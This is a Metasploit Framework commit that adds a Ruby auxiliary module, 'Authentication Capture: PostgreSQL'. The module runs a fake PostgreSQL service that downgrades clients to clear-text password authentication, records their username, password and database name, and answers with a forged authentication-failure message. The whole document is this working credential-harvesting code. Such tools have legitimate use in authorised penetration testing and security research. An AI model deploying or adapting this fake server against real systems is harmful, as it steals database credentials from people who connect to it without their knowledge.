Merge branch 'PostgreSQL' of https://github.com/kholia/metasploit-framework into kholia-PostgreSQL

jvazquez-r7 · jvazquez-r7 · commit 09c4c8172dc6 · 2012-10-03T18:26:34.000+02:00
diff --git a/modules/auxiliary/server/capture/postgresql.rb b/modules/auxiliary/server/capture/postgresql.rb
@@ -0,0 +1,116 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::TcpServer
+	include Msf::Auxiliary::Report
+
+	def initialize
+		super(
+			'Name'           => 'Authentication Capture: PostgreSQL',
+			'Version'        => '$Revision$',
+			'Description'    => %q{
+				This module provides a fake PostgreSQL service that is designed to
+				capture clear-text authentication credentials.},
+			'Author'         => 'Dhiru Kholia <dhiru at openwall.com>',
+			'License'        => MSF_LICENSE,
+			'Actions'        => [ [ 'Capture' ] ],
+			'PassiveActions' => [ 'Capture' ],
+			'DefaultAction'  => 'Capture'
+		)
+
+		register_options(
+			[
+				OptPort.new('SRVPORT', [ true, "The local port to listen on.", 5432 ]),
+			], self.class)
+	end
+
+	# This module is based on MySQL capture module by Patrik Karlsson.
+	# Reference: http://www.postgresql.org/docs/9.2/static/protocol-message-formats.html
+
+	def setup
+		super
+		@state = {}
+	end
+
+	def run
+		print_status("Listening on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}...")
+		exploit()
+	end
+
+	def on_client_connect(c)
+		@state[c] = {
+			:name    => "#{c.peerhost}:#{c.peerport}",
+			:ip      => c.peerhost,
+			:port    => c.peerport,
+		}
+		@state[c]["status"] = :init
+	end
+
+	def on_client_data(c)
+		data = c.get_once
+		return if not data
+		length = data.slice(0, 4).unpack("N")[0]
+		if length == 8 and @state[c]["status"] == :init
+			# SSL request
+			c.put 'N'
+			@state[c]["status"] = :send_auth_type
+		elsif @state[c]["status"] == :send_auth_type
+			# Startup message
+			length = data.slice!(0, 4).unpack("N")[0]
+			protocol = data.slice!(0, 4).unpack("N")[0]
+			sdata = [ 0x52, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x03 ].pack("CCCCCCCCC")
+			c.put sdata
+			data.slice!(0, 5) # skip over "user\x00"
+			@state[c][:username] = data.slice!(0, data.index("\x00") + 1).unpack("Z*")[0]
+			data.slice!(0, 9) # skip over "database\x00"
+			@state[c][:database] = data.slice!(0, data.index("\x00") + 1).unpack("Z*")[0]
+			@state[c]["status"] = :pwn
+		elsif @state[c]["status"] == :pwn and data[0] == 'p'
+			# Password message
+			length = data.slice!(0, 5).unpack("N")[0]
+			@state[c][:password] = data.slice!(0, data.index("\x00") + 1).unpack("Z*")[0]
+			report_auth_info(
+				:host  => c.peerhost,
+				:port => datastore['SRVPORT'],
+				:sname => 'psql',
+				:user => @state[c][:username],
+				:pass => @state[c][:password],
+				:type => "PostgreSQL credentials",
+				:proof => @state[c][:database],
+				:source_type => "captured",
+				:active => true
+			)
+			print_status("PostgreSQL LOGIN #{@state[c][:name]} #{@state[c][:username]} / #{@state[c][:password]} / #{@state[c][:database]}")
+			# send failure message
+			sdata = [
+				0x45, 97 - 8 + @state[c][:username].length, 0x53,
+				0x46, 0x41, 0x54, 0x41, 0x4c, 0x00, 0x43, 0x32,
+				0x38, 0x50, 0x30, 0x31, 0x00, 0x4d, 0x70, 0x61,
+				0x73, 0x73, 0x77, 0x6f, 0x72, 0x64, 0x20, 0x61,
+				0x75, 0x74, 0x68, 0x65, 0x6e, 0x74, 0x69, 0x63,
+				0x61, 0x74, 0x69, 0x6f, 0x6e, 0x20, 0x66, 0x61,
+				0x69, 0x6c, 0x65, 0x64, 0x20, 0x66, 0x6f, 0x72,
+				0x20, 0x75, 0x73, 0x65, 0x72, 0x20, 0x22
+			].pack("CN" + "C" * 56) + @state[c][:username] +
+				[ 0x22, 0x00, 0x46, 0x61, 0x75, 0x74, 0x68, 0x2e,
+				0x63, 0x00, 0x4c, 0x33, 0x30, 0x32, 0x00,
+				0x52, 0x61, 0x75, 0x74, 0x68, 0x5f, 0x66,
+				0x61, 0x69, 0x6c, 0x65, 0x64, 0x00, 0x00 ].pack("C" * 29)
+			c.put sdata
+			c.close
+		end
+
+	end
+
+	def on_client_close(c)
+		@state.delete(c)
+	end
+end
